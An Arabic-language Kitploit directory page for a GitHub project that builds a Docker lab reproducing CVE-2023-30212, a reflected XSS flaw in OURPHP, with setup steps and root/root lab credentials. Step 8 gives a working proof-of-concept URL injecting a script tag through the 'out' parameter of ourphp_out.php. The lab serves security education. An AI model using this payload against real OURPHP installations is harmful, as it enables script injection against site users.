Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2023-30212 — بيئة مختبرية قائمة على Docker لإعادة إنتاج CVE-2023-30212، وهي ثغرة XSS في OURPHP، مع تعليمات إعداد خطوة بخطوة للاختبار الأمني والتعليم. | Kitploit
أدوات/GitHubGitHub/aash035/cve-2023-30212
أمن الحاوياتتحليل الثغرات الأمنيةاستغلال تطبيقات الويبالتعلم والتعليممختبرات وتدريب عملي
GitHubaash035/cve-2023-30212

CVE-2023-30212

بيئة مختبرية قائمة على Docker لإعادة إنتاج CVE-2023-30212، وهي ثغرة XSS في OURPHP، مع تعليمات إعداد خطوة بخطوة للاختبار الأمني والتعليم.

عرض المستودع
1منذ 3 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2023-30212 إعداد المختبر

المتطلبات الأساسية
تحميل docker.io
sudo apt install -y docker.io


الخطوات
  1. قم بتنزيل جميع الملفات من مستودعي باستخدام الأمر التالي.
    git clone https://github.com/AAsh035/CVE-2023-30212.git

  2. الآن لإنشاء صورة Docker، قم بتشغيل الأمر التالي:
    sudo docker build -t vuln .

  3. الخطوة التالية هي تحويل صورة Docker إلى حاوية. تحتاج الحاوية إلى العمل على المنفذ 80. الأمر هو:
    sudo docker run -d -p 80:80 vuln

  4. للتحقق من أن الحاوية تعمل، استخدم الأمر:
    sudo docker ps

  5. اكتب 127.0.0.1 في المتصفح وستظهر صفحة OURPHP.

  6. تحتاج إلى تكوين ourphp بما يلي:
    اسم المستخدم: root
    كلمة المرور: root
    اسم قاعدة البيانات: vuln

  7. الآن تحتاج إلى تكوين اسم المستخدم وكلمة المرور للإدارة. قم بتعيين ما يلي:
    اسم المستخدم: root
    كلمة المرور: root

  8. الآن قم بنسخ الرابط أدناه ولصقه في المتصفح:
    http://localhost/client/manage/ourphp_out.php?ourphp_admin=logout&out=</script><script>alert("bug")</script>

https://github.com/AAsh035/CVE-2023-30212/assets/136836668/218c8eca-f02b-41b2-931b-ba112da6c7e0

تنزيل الأداة